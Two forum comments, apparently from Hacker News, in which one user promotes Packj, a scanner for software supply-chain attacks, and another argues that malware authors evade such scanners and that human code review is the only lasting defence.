| ▲ | ashishbijlani 11 hours ago | |
Plug: I've been building a tool to detect software supply-chain cyberattacks: https://github.com/ossillate-inc/packj Packj uses static+dynamic code/behavioral analysis to scan for indicators of compromise (e.g., spawning of shell, use of SSH keys, network communication, use of decode+eval, etc). It also checks for several metadata attributes to detect impersonating packages (typo squatting). | ||
| ▲ | lrvick 9 hours ago | parent [-] | |
Every decent malware author just adds tools like these to their test suites, and only release new malware that evades all detection. That game of cat and mouse never ends. The only solution is just actually reviewing the code we ship to our customers. Yes, even the code we copied off the internet with a magic "npm install" command. | ||